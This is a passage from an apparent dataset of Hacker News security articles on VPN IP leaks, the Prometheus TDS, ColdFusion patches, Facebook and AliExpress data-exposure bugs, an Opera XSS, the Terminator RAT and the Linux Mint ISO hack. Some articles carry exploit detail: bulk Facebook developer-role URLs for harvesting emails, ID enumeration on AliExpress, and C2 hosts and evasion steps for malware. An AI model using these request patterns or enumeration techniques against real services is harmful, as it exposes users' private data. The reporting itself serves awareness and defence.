IP-addresses of users' computers, including BitTorrent users, with relative ease. The vulnerability, dubbed Port Fail by VPN provider Perfect Privacy (PP) who discovered the issue, is a simple port forwarding trick and affects those services that: Allow port forwarding Have no protection against this specific attack Port Forwarding trick means if an attacker uses the same VPN (Virtual Private Network) as the victim, then the real IP-address of the victim can be exposed by forwarding Internet traffic to a specific port. ""The crucial issue here is that a VPN user connecting to his own VPN server will use his default route with his real IP address, as this is required for the VPN connection to work,"" Perfect Privacy wrote in a blog post on Thursday. Also Read: This Secure Operating System Can Protect You Even if You Get Hacked. Port Fail affects all VPN protocols including… OpenVPN IPSec …as well as applies to all operating systems, posing a huge privacy risk. How Does 'Port Fail' Work? A successful IP address leak attack requires an attacker to be on the same VPN network as the victim and to know the victim's VPN exit IP address, which could be discovered by tricking a victim into visiting a website control controlled by the attacker. For example, an attacker with port forwarding enabled can see the request from the victim's actual IP addresses by tricking the victim into opening an image file. The same attack is possible for BitTorrent users, but, in this case, there is no need for the attacker to redirect the victim to their page. In this case, the attacker only with the activated port forwarding for the default BitTorrent port, can expose the real IP-address of a VPN user on the same network. Also Read: Hackers Backdooring Cisco WebVPN To Steal Customers' Passwords Affected VPN Providers The flaw affected various large VPN providers. Perfect Privacy tested nine VPN providers out of which five were found to be vulnerable to this flaw and were alerted last week. VPN providers including Private Internet Access (PIA), Ovpn.to and nVPN have fixed the issue before publication. However, the company warned, ""other VPN providers may be vulnerable to this attack as we could not possibly test all."" VPN aims to make you sure that your real identity remains anonymous on the Internet so that nobody could track the origin of your connection back to you, but this newly discovered flaw shows that it's quite easy to bypass this on some VPN providers. ",Vulnerability A Wide Range of Cyber Attacks Leveraging Prometheus TDS Malware Service,https://thehackernews.com/2021/08/a-wide-range-of-cyber-attacks.html,"Multiple cybercriminal groups are leveraging a malware-as-a-service (MaaS) solution to carry out a wide range of malicious software distribution campaigns that result in the deployment of payloads such as Campo Loader, Hancitor, IcedID, QBot, Buer Loader, and SocGholish against individuals in Belgium as well as government agencies, companies, and corporations in the U.S. Dubbed ""Prometheus"" and available for sale on underground platforms for $250 a month since August 2020, the service is a Traffic Direction System (TDS) that's designed to distribute malware-laced Word and Excel documents, and divert users to phishing and malicious sites, according to a Group-IB report shared with The Hacker News. More than 3,000 email addresses are said to have been singled out via malicious campaigns in which Prometheus TDS was used to send malicious emails, with banking and finance, retail, energy and mining, cybersecurity, healthcare, IT, and insurance emerging the prominent verticals targeted by the attacks. ""Prometheus TDS is an underground service that distributes malicious files and redirects visitors to phishing and malicious sites,"" Group-IB researchers said. ""This service is made up of the Prometheus TDS administrative panel, in which an attacker configures the necessary parameters for a malicious campaign: downloading malicious files, and configuring restrictions on users' geolocation, browser version, and operating system."" The service is also known to employ third-party infected websites that are manually added by the campaign's operators and act as a middleman between the attacker's administrative panel and the user. To achieve this, a PHP file named ""Prometheus.Backdoor"" is uploaded to the compromised website to collect and send back data about the victim, based on which a decision is taken as to whether to send the payload to the user and/or to redirect them to the specified URL. The attack scheme commences with an email containing a HTML file, a link to a web shell that redirects users to a specified URL, or a link to a Google Doc that's embedded with an URL that redirects users to the malicious link that when either opened or clicked leads the recipient to the infected website, which stealthily collects basic information (IP address, User-Agent, Referrer header, time zone, and language data) and then forwards this data to the Prometheus admin panel. In the final phase, the administrative panel takes responsibility for sending a command to redirect the user to a particular URL, or to send a malware-ridden Microsoft Word or Excel document, with the user redirected to a legitimate site like DocuSign or USPS immediately after downloading the file to mask the malicious activity. Besides distributing malicious files, researchers found that Prometheus TDS is also used as a classic TDS to redirect users to specific sites, such as fake VPN websites, dubious portals selling Viagra and Cialis, and banking phishing sites. ""Prometheus TDS also redirected users to sites selling pharmaceutical products,"" the researchers noted. ""Operators of such sites often have affiliate and partnership programs. Partners, in turn, often resort to aggressive SPAM campaigns in order to increase the earnings within the affiliate program. Analysis of the Prometheus infrastructure by Group-IB specialists revealed links that redirect users to sites relating to a Canadian pharmaceutical company."" ",Malware Adobe Issues ColdFusion Software Update for 6 Critical Vulnerabilities,https://thehackernews.com/2018/09/adobe-software-updates.html,"Adobe has released September 2018 security patch updates for a total of 10 vulnerabilities in Flash Player and ColdFusion, six of which are rated as critical that affected ColdFusion and could allow attackers to remotely execute arbitrary code on a vulnerable server. What's the good news this month for Adobe users? This month Adobe Acrobat and Reader applications did not receive any patch update, while Adobe Flash Player has received an update for just a single privilege escalation vulnerability (CVE-2018-15967) rated as important. Secondly, Adobe said none of the security vulnerabilities patched this month were either publicly disclosed or found being actively exploited in the wild. Total 9 Security Patches for Adobe ColdFusion Adobe has addressed a total of nine security vulnerabilities in its ColdFusion web application development platform, six of which are critical, two important and one moderate. According to the advisory released by Adobe, ColdFusion contained four critical deserialization of untrusted data vulnerabilities (CVE-2018-15965, CVE-2018-15957, CVE-2018-15958, CVE-2018-15959) that could result in arbitrary code execution. Out of the remaining two critical vulnerabilities addressed in ColdFusion, one is unrestricted file upload flaw (CVE-2018-15961) that could lead to arbitrary code execution, and the other (CVE-2018-15960) could enable arbitrary file overwrite. The company has also released patches for two ""important"" security vulnerabilities in ColdFusion--security bypass glitch (CVE-2018-15963) that allows arbitrary folder creation, and directory listing flaw (CVE-2018-15962) that could enable information disclosure--and a moderate information disclosure bug (CVE-2018-15964). The vulnerabilities impact 2016 (Update 6 and earlier versions) and the July 12 (2018) release of ColdFusion, along with ColdFusion 11 (Update 14 and earlier versions). Adobe recommends end users and administrators to update their installations to ColdFusion 2018 Update 1, ColdFusion 2016 Update 7, and ColdFusion 11 Update 15. Adobe Also Patches An important Flaw In Flash Player Besides ColdFusion, Adobe also released a security update for Flash Player for Windows, macOS, Linux, and Chrome OS, addressing an ""important"" flaw in all for versions 30.0.0.154 and earlier for Google Chrome, Desktop Runtime, Microsoft Edge and Internet Explorer 11. The issue is a privilege escalation vulnerability (CVE-2018-15967) that could lead to information disclosure. The company recommends Flash Player users to update to version 31.0.0.208 as soon as possible. ",Vulnerability Another Facebook hack exposes primary email address facebook users,https://thehackernews.com/2013/07/another-facebook-hack-exposes-primary.html,"Last week we explained a critical vulnerability in Facebook that discloses the primary email address of facebook user. Later the bug was patched by Facebook Security Team. Today another similar interesting Facebook hack disclosed by another bug hunter, Roy Castillo. On his blog he explained a new facebook hack method that allows anyone to grab primary emails addresses of billions of Facebook users easily. Facebook Provides a App Dashboard for creating and managing your Facebook apps, with a range of tools to help you configure, build and debug your Facebook apps. The flaw exists in App settings, where application admin can add developer's profile also, but if the user is not a verified user, a error messages on page will disclose his primary email address. Using following mentioned steps, one was able to grab email addresses of all facebook users: Collect profile links of all facebook users from Facebook People Directory i.e https://www.facebook.com/directory/people/ Collect Numerical Facebook ID for each Profile from facebook Graph API i.e https://graph.facebook.com/mohitkumar.thehackernews where extracted user ID is 1251386282 Create a Facebook Application -> Go to Settings -> Developer Roles and add try to add a Developer profile, if its a valid ID, application will accept that, otherwise a error message will display the email address of that profile. To submit profile ID directly from URL parameters : https://developers.facebook.com/apps/APPLICATION_ID/roles?unverified_groups[1][0]=VICTIM_UID Where APPLICATION_ID is application ID and VICTIM_UID is numerical id of facebook profiles collected from step 2. To submit more profiles in bulk: https://developers.facebook.com/apps/APPLICATION_ID/roles ?unverified_groups[1][0]=VICTIM_UID1 &unverified_groups[2][0]=VICTIM_UID2 &unverified_groups[3][0]=VICTIM_UID3 &unverified_groups[4][0]=VICTIM_UID4 &unverified_groups[5][0]=VICTIM_UID5 &unverified_groups[6][0]=VICTIM_UID6 &unverified_groups[7][0]=VICTIM_UID7 &unverified_groups[8][0]=VICTIM_UID8 &unverified_groups[9][0]=VICTIM_UID9 &unverified_groups[10][0]=VICTIM_UID10 and so forth... This way attacker is able to dump the primary email address of any number of facebook users at once. But was reported to facebook security team by Roy and he is rewarded with $4500 under bug bounty program. ",Vulnerability Universal Cross-site scripting vulnerability in Opera browser,https://thehackernews.com/2012/10/universal-cross-site-scripting.html,"A Universal Cross-site scripting vulnerability in Opera browser was disclosed today on a Russian forum rdot.org. The flaw has the ability to be triggered by exploiting flaws inside browsers, instead of leveraging the vulnerabilities against insecure web sites. ""Vulnerable versions Opera for Windows, Mac and Linux to 2.12 inclusive (the latest version as of today). On versions prior to 9.50 check is not performed. advise after referring to the following opera when redirecting to a site on data: URL via HTTP -header Location property document.domain has a value in the last redirecting site"" The vulnerability actually use the Data URI Scheme in combination with another flaw called ""Open Redirection"" which happens when an attacker can use the webpage to redirect the user to any URI of his choice. Even one don't have ""Open Redirection"" flaw in his site, still this XSS can be triggered using various short url services like bit.ly and tinyurl.com. Here's a proof-of-concept link on tinyurl: https://tinyurl.com/operauxss. If you open this link in Opera, you will find yourself looking at an alert box saying ""tinyurl.com"". This means that the javascript executes within the domain of tinyurl.com. Because of that, an attacker could read data within the domain and steal the users cookies for the domain as well. There is a small Fix you can do -Go to Tools->Preferences->Advanced->Network and uncheck the checkbox labeled ""Enable automatic redirection"". ",Vulnerability Free Ransomware Decryption Tool — CoinVault and Bitcryptor,https://thehackernews.com/2015/10/ransomware-decryption-tool.html,"Have you been infected with the insidious CoinVault or Bitcryptor ransomware? If so, there is some potentially good news for you. You may now recover your encrypted files for FREE! – Thanks to the efforts of Dutch police and antivirus maker Kaspersky Lab. Security researchers from Kaspersky Lab and the Dutch Public Prosecution Service have obtained and published the last set of encryption keys from command-and-control (C&C) servers used by two related ransomware threats – CoinVault and Bitcryptor. Security researchers first observed CoinVault ransomware attacks in May 2014. Since then, CoinVault has made more than 1,500 victims in more than 108 countries. In April 2015, the Dutch police obtained 'Decryption keys' database from a seized command and control server of CoinVault. Ransomware Decryption Tool Those decryption keys were then used by Kaspersky Lab to set up a Ransomware Decryptor Service, which included a set of around 750 decryption keys recovered from CoinVault servers hosted in the Netherlands. After that raid, the CoinVault's authors slowly updated their code, eventually releasing a second-generation CoinVault version that they named Bitcryptor. However, last month, the Dutch authorities arrested two men in connection with CoinVault and Bitcryptor ransomware attacks, leading to the recovery of additional 14,031 decryption keys. The keys have now been updated to the Kaspersky's Ransomware Decryptor Service and published on the noransom.kaspersky.com website. Those victims that had their PCs infected by these ransomware programs and still have the encrypted data lying around can now download these keys to unlock their personal files. How to Decrypt CoinVault and Bitcryptor Ransomware: Step 1: Note down the Bitcoin wallet address mentioned by the malware. Step 2: Get the encrypted file list from the ransomware interface. Step 3: Then download an effective antivirus and remove CoinVault Ransomware. Step 4: Open https://noransom.kaspersky.com and download the decryption tool released by Kaspersky Labs. Step 5: Install additional libraries and Decrypt your files. However, there's only one catch: ""If you get infected by this ransomware in the near future, you are out of luck."" Ransomware on Rise Ransomware has emerged as one of the biggest Internet threats to the web users in recent years. The authors of the notorious CryptoWall ransomware have raised more than $325 MILLION (£212 million) in this past year alone. Typically, hackers primarily gain access to a user's computer using ransomware malware that heavily encrypts data files with a strong cryptographic algorithm, and then demand a ransom money (to be paid in Bitcoin), which ranges from $200 to $10,000. How to Prevent Yourself Against Ransomware Attacks? Just few days back, the Federal Bureau of Investigation (FBI) advised ransomware victims to just pay off the criminals in order to see their valuable data again. However, in my opinion, the best defense against these threats is to ensure that all your important files are regularly backed up to a separate drive or storage that are only temporarily connected and can not be reached by the attackers. A few more things you should keep in mind to prevent your Computer from getting infected with ransomware and other malware threats are: Ensure your system software and antivirus definitions are up-to-date. Avoid visiting suspicious websites. Avoid Opening Emails and attachments from unknown sources. ",Malware New Mac OS X adware Trojan spreading via browser plugin,https://thehackernews.com/2013/03/new-mac-os-x-adware-trojan-spreading.html,"Russian anti-virus company Doctor Web reports that a new Mac OS X adware Trojan spreading itself via crafted movie trailer pages that prompt users to install a browser plugin. Basically, an adware is any software package which automatically renders advertisements in order to generate revenue for its author. Dubbed as 'Trojan.Yontoo.1', Attackers have provided a number of alternative ways to spread the threat. The Trojan can also be downloaded as a media player, a video quality enhancement program or a download accelerator. When victim visits the site, the dialogue only imitates the traditional plate and specially designed by hackers to enter a potential victim of misleading. After pressing the «Install the plug-in» victim is redirected to the site to download malware. When launched, Trojan.Yontoo.1 displays a dialogue window that asks the user if they want to install Free Twit Tube. after the user presses 'Continue', instead of the promised program, the Trojan downloads. While a user surfs the web, the plugin transmits information about the loaded pages to a remote server. In return, it gets a file that enables the Trojan to embed third-party code into pages visited by the user. This is how an apple.com page is displayed on an infected machine. ",Malware AliExpress WebSite Vulnerability Exposes Millions of Users' Private Information,https://thehackernews.com/2014/12/aliexpress-website-vulnerability_7.html,"A critical, but easily exploitable personal information disclosure vulnerability has been discovered in the widely popular online marketplace AliExpress website that affects its millions of users worldwide. The reported vulnerability could allow anyone to steal personal information of hundreds of millions of AliExpress users without knowing their account passwords. AliExpress is an online marketplace owned by Chinese E-Commerce giant Alibaba.com, which offers more than 300 Million active users from more than 200 countries and regions to order items in bulk or one at a time at low wholesale prices. Amitay Dan, an Israeli application security researcher working at Cybermoon.cc, reported the vulnerability to The Hacker News after providing full disclosure of the flaw to the AliExpress team and Israeli media. According to the Proof-of-Concept video and screenshots provided by the security researcher to The Hacker News, AliExpress website allows logged in user to add/update their shipping address and contact number at the following URL i.e. https://trade.aliexpress.com/mailingaddress/mailingAddress.htm?mailingAddressId=123456 Where ""123456"" is the user id of the logged in user. Researcher noticed that just by changing value of ""mailingAddressId"" parameter to a different value, one could easily exploit the validation flaw of the website to display the Mailing Address and contact information of the respective user on the same webpage, as shown. A Smart attacker can simply gather personal information of millions of AliExpress users just by using an automated script to crawl ""mailingAddress.htm"" page for all possible numbers between 1 to 99999999999 as ""mailingAddressId"" parameter value. The vulnerability has been reported to AliExpress team and will soon be patched in coming hours, researcher indicated. ",Vulnerability Terminator RAT became more sophisticated in recent APT attacks,https://thehackernews.com/2013/10/terminator-rat-became-more.html,"Advanced Persistent Threat (APT) is a term referring to targeted attacks on enterprises and other organizations and recently referred to what appeared to be nation-state intelligence agencies using cyber assaults for both conventional espionage and industrial espionage. Advanced threats have targeted control systems in the past and these attacks use commercially available and custom-made advanced malware to steal information or perpetrate fraud. Terminator RAT has been used against Tibetan and Uyghur activists before and while tracking attack against entities in Taiwan, the Cyber Security company FireEye Labs recently analyzed some new samples of 'Terminator RAT' (Remote Access Tool) that was sent via spear-phishing emails to targets in Taiwan. A word document as an attachment was sent to victims, exploited a vulnerability in Microsoft Office (CVE-2012-0158), which subsequently drops a malware installer named ""DW20.exe"". Sometimes the simplest techniques can foil the complex systems created by security firms and large enterprises to detect malicious programs and files. Lets see - What Evasion techniques this Advance version of Terminator RAT is using: This executable will first create its working folders located at ""%UserProfile%\Microsoft"" and ""%AppData%\2019"", where it will store configurations and executable files (svchost_.exe and sss.exe). Malware terminates and remove itself after installation. The malware will only run after reboot. This is one effective way to evade sandbox automatic analysis, as malicious activity will only reveal after a reboot. The RAT (svchost_.exe) will collaborate with its relay (sss.exe) to communicate with the command and control server at liumingzhen.zapto.org / 123.51.208.69 and liumingzhen.myftp.org / 123.51.208.69. This component plays the role as a network relay between the malware and the proxy server, by listening over port 8000. This folder ""2019"" was then configured to be the new start up folder location by changing the registry ""HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startupdeter forensics investigation."" to deter forensics investigation by changing the startup location. Also to deter file-based scanning that implements a maximum file size filter, by expanding the size of svchost_.exe to 40MB. It is clear cybercrime is getting more organized and cybercriminals are becoming so much more sophisticated. Hackers are using stealth or advanced malware, usually to infiltrate hosts in networks and steal valuable data and APT attacks are increasingly becoming more sophisticated and harder to detect. ",Vulnerability Spanish Court Agrees to Extradite Russian Spam King to the United States,https://thehackernews.com/2017/10/peter-levashov-kelihos.html,"Spain's National Court ruled on Tuesday to extradite a 36-year-old Russian computer programmer, accused by American authorities of malicious hacking offences, to the United States, according to a court document. Peter Yuryevich Levashov, also known as Peter Severa, was arrested in April this year when he was travelling with his family to Barcelona, Spain from his home in Russia—a country without an extradition treaty with the United States—for his role in a huge computer botnet. However, since Levashov has previously worked with for Vladimir Putin's United Russia Party for ten years, he fears that the US authorities would torture him for information about his political work if sent there to face the charges against him. ""If I go to the U.S., I will die in a year. They want to get information of a military nature and about the United Russia party,"" RIA news agency quoted Levashov as saying. ""I will be tortured, within a year I will be killed, or I will kill myself."" Levashov was accused of operating the Kelihos botnet—a global network of more than 100,000 infected computers used to deliver spam, steal login passwords and infect computers with ransomware and other malware since at least 2010. While initially it was speculated that Levashov was involved in 2016 U.S. election hacking, the FBI made it clear that the suspect was arrested due to his involvement in the Kelihos botnet and spamming targets for trying and forcing them to buy worthless stock. According to the FBI officials, Levashov used the same IP address to operate Kelihos botnet that he used to access his email and other online accounts in his name, including Apple iCloud and Google Gmail accounts. The Department of Justice's indictment said the Russian suspect allegedly used Kelihos to distribute hundreds of millions of spam e-mails every year, and pump-and-dump stock scams, especially targeting Microsoft Windows machines for infection. Besides conducting spamming operations, Levashov also allegedly used the Kelihos botnet to infect end-user computers with malware and harvest passwords to online and bank accounts belonging to thousands of Americans. The United States had requested Levashov's arrest, and after his arrest in April 2016, Russia in September filed a counter-extradition request for Levashov hours before the original extradition hearing. However, Spain's High Court has approved the U.S. extradition request of Levashov, who has been charged with wire fraud and unauthorised interception of electronic communications. United States prosecutors are seeking a 52-year jail sentence against Levashov, who has already denied the charges against him, Reuters reported. Levashov has now just three days to appeal his extradition to the United States. ",Malware Twitter Discloses Suspected State-Sponsored Attack After Minor Data Breach,https://thehackernews.com/2018/12/twitter-data-breach.html,"Twitter has been hit with a minor data breach incident that the social networking site believes linked to a suspected state-sponsored attack. In a blog post published on Monday, Twitter revealed that while investigating a vulnerability affecting one of its support forms, the company discovered evidence of the bug being misused to access and steal users' exposed information. The impacted support form in question was used by account holders to contact Twitter about issues with their account. Discovered in mid-November, the support form API bug exposed considerably less personal information, including the country code of users' phone numbers associated with their Twitter account, and ""whether or not their account had been locked."" So far the company has declined to provide more details about the incident or an estimate for the number of accounts potentially impacted but says it believes that the attack may have ties to state-sponsored actors. ""During our investigation, we noticed some unusual activity involving the affected customer support form API. Specifically, we observed a large number of inquiries coming from individual IP addresses located in China and Saudi Arabia,"" Twitter says in a post about the incident. ""While we cannot confirm intent or attribution for certain, it is possible that some of these IP addresses may have ties to state-sponsored actors."" Twitter also assures its users that the issue does not expose full phone numbers or any other personal data related to the user. Twitter says that the social networking site addressed the issue within just one day on November 16 and that there is no action required from the users' side. When the company became aware of the incident, it started investigating the origins and background of the breach to ""provide you with as much information as possible,"" and also updated law enforcement. Twitter has started directly notifying the users who, according to the company, have been impacted by the incident. ""We have directly informed the people we identified as being affected,"" the company writes. ""We are providing this broader notice as it is possible that other account holders we cannot identify were potentially impacted."" Like other social media platforms, Twitter has also been hit by a number of security incidents this year. In May, Twitter urged all of its 330 million users to change their passwords after a software glitch unintentionally exposed its users' account passwords by storing them in plain text on an internal log. In September, a flaw in Twitter's Account Activity API exposed some of its users' direct messages (DMs) and protected tweets to unauthorized, third-party app developers who weren't supposed to get them. Over the weekend, Twitter was also hit by another software glitch that allowed unapproved third-party apps to access and read users' direct messages (DMs), even when they told users that they would not. ",Data_Breaches Hackers to release 0-days in comics,https://thehackernews.com/2012/02/hackers-to-release-0-days-in-comics.html,"Hackers to release 0-days in comics Hackers frequently disclose vulnerabilities in various products, but taking it to a whole new level, now hackers and malware coders are planning to release actual 0-days through their own comic books. The Malware conference, Malcon announced it on their groups yesterday. In the making from last three months, the comic is planned for release with objective of simplifying and helping coders understand the art behind malcoding for offensive defense and security. It is learned that there will be two formats for the comic - a web and a printed version. The printed version will be specifically for the Indian Government officials, Intelligence agencies and Law enforcement groups, who are regular attendees at the conference. This is also seen as a remarkable and significant point in the history and evolution of hackers and also points at things to come in wake of real threats with respect to cyber warfare capabilities of India in future. On condition of anonimity a supporting member said ""It is fascinating - just imagine, you read this hack in a freshly released comic book and can actually play it out in real world and exploit it till the time the vendors fix it! I mean we have seen hacking techniques adapted in movies and books, but taking one from and using in real world - its weird and fantastic!"" The comic will have a super hero or not is yet to be disclosed - however, Professional hackers are already ""excited"" at this and have poured in their support to MalCon to help them in the project. Guess we can now read comics officially on job and tell our bosses ""Its for data security!"" ",Malware Verizon FiOS app vulnerability Exposes 5 MILLION Customers' Email Addresses,https://thehackernews.com/2015/01/verizon-fios-app-vulnerability-exposes_18.html,"A critical vulnerability discovered in Verizon's FiOS mobile application allowed an attacker to access the email account of any Verizon customer with relative ease, leaving almost five million user accounts of Verizon's FiOS application at risk. The FiOS API flaw was discovered by XDA senior software developer Randy Westergren on January 14, 2015, when he found that it was possible to not only read the contents of other users' inboxes, but also send message on their behalf. The issue was discovered while analyzing traffic generated by the Android version of My FiOS, which is used for account management, email and scheduling video recordings. Westergren took time to put together a proof-of-concept showing serious cause for concern, and then reported it to Verizon. The telecom giant acknowledged the researcher of the notification the same day and issued a fix on Friday, just two days after the vulnerability was disclosed. That's precisely how it should be done - quickly and efficiently. Microsoft could learn a lot more from Verizon, as Microsoft wasn't able to fix the security flaws in its software reported by Google's Project Zero team even after a three-month-long time period provided to the company. One-after-one three serious zero-day vulnerabilities in Windows 7 and 8.1 were disclosed by Google's security team before Microsoft planned to patch them. The FiOS API flaw, actually contained in the application's API, allowed any account to be accessed by manipulating user identification numbers in web requests, giving attackers ability to read individual messages from a person's Verizon inbox. ""Altering the uid parameter and specifying another username shouldn't have an effect, since I'm logged in and my session is maintained through my cookies,"" Westergren wrote in an advisory. ""Amazingly, this was not the case. Substituting the uid with the username of another email account indeed returned the contents of their inbox."" According to the security researcher, the vulnerability even allowed attackers to send email messages from victims' accounts and found and exploited further vulnerable API calls. ""It was my suspicion that all of the API methods for this widget within the app were vulnerable. My last test was sending an outgoing message as another user [which was] also successful,"" Westergren wrote. The problem has been fixed by the telecom giant, so there is no need for users to worry about it. Verizon rewarded Westergren with a year's worth of free internet. ""Version's (corporate) security group seemed to immediately realize the impact of this vulnerability and took it very seriously,"" Westergren said. ",Vulnerability Hacker Who Hacked Official Linux Kernel Website Arrested in Florida,https://thehackernews.com/2016/09/linux-kernel-hacking.html,"Around five years after unknown hackers gained unauthorized access to multiple kernel.org servers used to maintain and distribute the Linux operating system kernel, police have arrested a South Florida computer programmer for carrying out the attack. Donald Ryan Austin, a 27-year-old programmer from of El Portal, Florida, was charged Thursday with hacking servers belonging to the Linux Kernel Organization (kernel.org) and the Linux Foundation in 2011, the Department of Justice announced on Thursday. The Linux Kernel Organization runs kernel.org servers for distributing the Linux operating system kernel, which is the heart of the operating system, whereas the Linux Foundation is a separate group that supports kernel.org. According to an indictment [PDF] unsealed by federal prosecutors on Monday, Austin managed to steal login credentials of one of the Linux Kernel Organization system administrators in 2011 and used them to install a hard-to-detect malware backdoor, dubbed Phalanx, on servers belonging to the organization. But what made the breach much significant? It's the open-source operating system that's being used by Millions of corporate and government networks worldwide. Using the Phalanx malware, Austin allegedly installed Ebury – a Trojan designed for Linux, FreeBSD or Solaris hacking – on a number of servers run by the Linux groups, which helped him gain access to the login credentials of people using the servers. Austin allegedly infected Linux servers, including ""Odin1,"" ""Zeus1,"" and ""Pub3,"" which were leased by the Linux Foundation for operating kernel.org. He also hacked the personal email server of Linux Kernel Organization's founder Peter Anvin. Austin is also accused of allegedly using his unauthorized admin privileges to insert messages into the system that would display when the servers restarted. According to prosecutors, Austin's motive for the intrusion was to gain early access to Linux software builds distributed through the www.kernel.org website. Bad Luck! Hacker Arrested while Breaking Traffic Rules This security breach forced the Linux Foundation to shut down kernel.org completely while a malware infection was cleared up, and rebuild several of its servers. Miami Shores Police stopped Austin while breaking traffic rules on August 28 and then arrested after identified as a suspect in 2011 case. Austin is charged with 4 counts of ""intentional transmission causing damage to a protected computer."" He was released from jail on a bond of $50,000 provided by the family of his girlfriend. Judge has ordered Austin to stay away from the Internet, computers, and every type of social media or e-mail services, due to his ""substance abuse history."" Austin is scheduled to appear in San Francisco federal court on September 21 before the Honorable Sallie Kim, and if found guilty, he faces a possible sentence of 40 years in prison as well as $2 Million in fines. ",Malware A Google Docs Bug Could Have Allowed Hackers See Your Private Documents,https://thehackernews.com/2020/12/a-google-docs-bug-could-have-allowed.html,"Google has patched a bug in its feedback tool incorporated across its services that could be exploited by an attacker to potentially steal screenshots of sensitive Google Docs documents simply by embedding them in a malicious website. The flaw was discovered on July 9 by security researcher Sreeram KL, for which he was awarded $3133.70 as part of Google's Vulnerability Reward Program. Many of Google's products, including Google Docs, come with a ""Send feedback"" or ""Help Docs improve"" option that allows users to send feedback along with an option to include a screenshot — something that's automatically loaded to highlight specific issues. But instead of having to duplicate the same functionality across its services, the feedback feature is deployed in Google's main website (""www.google.com"") and integrated to other domains via an iframe element that loads the pop-up's content from ""feedback.googleusercontent.com."" This also means that whenever a screenshot of the Google Docs window is included, rendering the image necessitates the transmission of RGB values of every pixel to the parent domain (www.google.com), which then redirects those RGB values to the feedback's domain, which ultimately constructs the image and sends it back in Base64 encoded format. Sreeram, however, identified a bug in the manner these messages were passed to ""feedback.googleusercontent.com,"" thus allowing an attacker to modify the frame to an arbitrary, external website, and in turn, steal and hijack Google Docs screenshots which were meant to be uploaded to Google's servers. Notably, the flaw stems from a lack of X-Frame-Options header in the Google Docs domain, which made it possible to change the target origin of the message and exploit the cross-origin communication between the page and the frame contained in it. While the attack requires some form of user interaction — i.e. clicking the ""Send feedback"" button — an exploit could easily leverage this weakness to capture the URL of the uploaded screenshot and exfiltrate it to a malicious site. This can be achieved by embedding a Google Docs file in an iFrame on a rogue website and hijacking the feedback pop-up frame to redirect the contents to a domain of the attacker's choice. Failing to provide a target origin during cross-origin communication raises security concerns in that it discloses the data that's sent to any website. ""Always specify an exact target origin, not *, when you use postMessage to send data to other windows,"" Mozilla documentation states. ""A malicious site can change the location of the window without your knowledge, and therefore it can intercept the data sent using postMessage."" ",Vulnerability Warning — Linux Mint Website Hacked and ISOs replaced with Backdoored Operating System,https://thehackernews.com/2016/02/linux-mint-hack.html,"Are you also the one who downloaded Linux Mint on February 20th? You may have been Infected! Linux Mint is one of the best and popular Linux distros available today, but if you have downloaded and installed the operating system recently you might have done so using a malicious ISO image. Here's why: Last night, Some unknown hacker or group of hackers had managed to hack into the Linux Mint website and replaced the download links on the site that pointed to one of their servers offering a malicious ISO images for the Linux Mint 17.3 Cinnamon Edition. ""Hackers made a modified Linux Mint ISO, with a backdoor in it, and managed to hack our website to point to it,"" the head of Linux Mint project Clement Lefebvre said in a surprising announcement dated February 21, 2016. Who are affected? As far as the Linux Mint team knows, the issue only affects the one edition, and that is Linux Mint 17.3 Cinnamon edition. The situation happened last night, so the issue only impacts people who downloaded the above-mentioned version of Linux Mint on February 20th. However, if you have downloaded the Cinnamon edition or release before Saturday 20th, February, the issue does not affect you. Even if you downloaded a different edition including Mint 17.3 Cinnamon via Torrent or direct HTTP link, this does not affect you either. What had Happened? Hackers believed to have accessed the underlying server via the team's WordPress blog and then got shell access to www-data. From there, the hackers manipulated the Linux Mint download page and pointed it to a malicious FTP (File Transfer Protocol) server hosted in Bulgaria (IP: 5.104.175.212), the investigative team discovered. The infected Linux ISO images installed the complete OS with the Internet Relay Chat (IRC) backdoor Tsunami, giving the attackers access to the system via IRC servers. Tsunami is a well-known Linux ELF trojan that is a simple IRC bot used for launching Distributed Denial of Service (DDoS) attacks. Hackers vs. Linux Mint SysAdmins However, the Linux Mint team managed to discover the hack, cleaned up the links from their website quickly, announced the data breach on their official blog, and then it appears that the hackers compromised its download page again. Knowing that it has failed to eliminate the exact point of entry of hackers, the Linux Mint team took the entire linuxmint.com domain offline to prevent the ISO images from spreading to its users. The Linux Mint official website is currently offline until the team investigates the issue entirely. However, the hackers' motive behind the hack is not clear yet. ""What we don't know is the motivation behind this attack. If more efforts are made to attack our project and if the goal is to hurt us, we'll get in touch with authorities and security firms to confront the people behind this,"" Lefebvre added. Hackers Selling Linux Mint Website's Database The hackers are selling the Linux Mint full website's database for a just $85, which shows a sign of their lack of knowledge. The hack seems to be a work of some script kiddies or an inexperienced group as they opted to infect a top-shelf Linux distro with a silly IRC bot that is considered to be outdated in early 2010. Instead, they would have used more dangerous malware like Banking Trojans. Also, even after the hack was initially discovered, the hackers re-compromised the site, which again shows the hackers' lack of experience. Here's How to Protect your Linux Machine Users with the ISO image can check its signature in an effort to make sure it is valid. To check for an infected download, you can compare the MD5 signature with the official versions, included in Lefebvre's blog post. If found infected, users are advised to follow these steps: Take the computer offline. Backup all your personal data. Reinstall the operating system (with a clean ISO) or format the partition. Change passwords for sensitive websites and emails. You can read full detail about the hack here. The official website is not accessible at the time of writing. We'll update the story when we hear more. ",Malware BlueBorne: Critical Bluetooth Attack Puts Billions of Devices at Risk of Hacking,https://thehackernews.com/2017/09/blueborne-bluetooth-hacking.html,"If you are using a Bluetooth enabled device, be it a smartphone, laptop, smart TV or any other IoT device, you are at risk of malware attacks that can carry out remotely to take over your device even without requiring any interaction from your side. Security researchers have just discovered total 8 zero-day vulnerabilities in Bluetooth protocol that impact more than 5.3 Billion devices—from Android, iOS, Windows and Linux to the Internet of things (IoT) devices—using the short-range wireless communication technology. Using these vulnerabilities, security researchers at IoT security firm Armis have devised an attack, dubbed BlueBorne, which could allow attackers to completely take over Bluetooth-enabled devices, spread malware, or even establish a ""man-in-the-middle"" connection to gain access to devices' critical data and networks without requiring any victim interaction. All an attacker need is for the victim's device to have Bluetooth turned on and obviously, in close proximity to the attacker's device. Moreover, successful exploitation doesn't even require vulnerable devices to be paired with the attacker's device. BlueBorne: Wormable Bluetooth Attack What's more worrisome is that the BlueBorne attack could spread like the wormable WannaCry ransomware that emerged earlier this year and wrecked havoc by disrupting large companies and organisations worldwide. Ben Seri, head of research team at Armis Labs, claims that during an experiment in the lab, his team was able to create a botnet network and install ransomware using the BlueBorne attack. However, Seri believes that it is difficult for even a skilled attacker to create a universal wormable exploit that could find Bluetooth-enabled devices, target all platform together and spread automatically from one infected device to others. ""Unfortunately, this set of 